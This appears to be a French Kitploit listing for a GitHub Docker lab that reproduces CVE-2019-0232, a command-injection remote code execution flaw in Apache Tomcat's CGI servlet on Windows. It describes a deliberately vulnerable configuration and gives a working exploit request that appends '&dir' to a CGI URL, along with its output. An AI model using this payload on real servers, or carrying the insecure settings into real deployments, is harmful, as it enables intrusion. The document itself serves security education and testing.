Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Preproduce-CVE-2019-0232 | Kitploit
Outils/GitHubGitHub/luongchivi/preproduce-cve-2019-0232
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubluongchivi/preproduce-cve-2019-0232

Preproduce-CVE-2019-0232

Voir le dépôt
il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-0232 - Exécution de code à distance dans le servlet CGI Apache Tomcat

Ce dépôt fournit un environnement de laboratoire basé sur Docker pour reproduire la vulnérabilité CVE-2019-0232 dans Apache Tomcat 9.0.17 sur Windows.

Présentation de la vulnérabilité

CVE-2019-0232 est une vulnérabilité d'exécution de code à distance dans le servlet CGI Apache Tomcat lorsqu'il s'exécute sur Windows. Le problème provient d'une gestion incorrecte des arguments de la ligne de commande lorsque le paramètre enableCmdLineArguments est défini sur true. Un attaquant peut transmettre des arguments arbitraires au script CGI via la chaîne de requête, entraînant l'exécution de commandes système.

  • Versions affectées : Apache Tomcat 9.0.0.M1 à 9.0.17
  • Versions corrigées : 9.0.18 et ultérieures
  • Conditions requises :
    • Système d'exploitation Windows
    • enableCmdLineArguments=true dans la configuration du servlet CGI
    • Servlet CGI activé et mappé sur un modèle d'URL

Environnement du laboratoire

Structure du répertoire

root@kitploit:~
tomcat-cgi-lab
├── docker-compose.yml
├── Dockerfile
└── tomcat
	├── apache-tomcat-9.0.17-windows-x64.zip
    └── apache-tomcat-9.0.17
        ├── conf
        │   └── context.xml              ← (privileged="true")
        └── webapps
            └── ROOT
                └── WEB-INF
                    ├── web.xml           ← (CGI configuration)
                    └── cgi-bin
                        └── test.bat      ← (.bat script)

Fichiers de configuration

  • context.xml : définit privileged="true" pour permettre à l'application web d'utiliser le servlet CGI.
  • web.xml : définit le servlet CGI avec enableCmdLineArguments=true et le mappe sur /cgi-bin/*.
  • test.bat : un simple script batch qui renvoie un message de bienvenue.

Pour commencer

Prérequis

  • Docker (mode conteneurs Windows)
  • Docker Compose

Construction et exécution

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

Exploitation

root@kitploit:~
curl -i "http://localhost:8080/cgi-bin/test.bat?&dir"

Welcome to CGI Test Page
 Volume in drive C has no label.
 Volume Serial Number is 3E70-7C38

 Directory of C:\apache-tomcat-9.0.17\webapps\ROOT\WEB-INF\cgi-bin

07/12/2026  11:45 AM    <DIR>          .
07/12/2026  11:45 AM    <DIR>          ..
07/12/2026  12:25 PM                78 test.bat
               1 File(s)             78 bytes
               2 Dir(s)  136,027,971,584 bytes free
Télécharger l’outil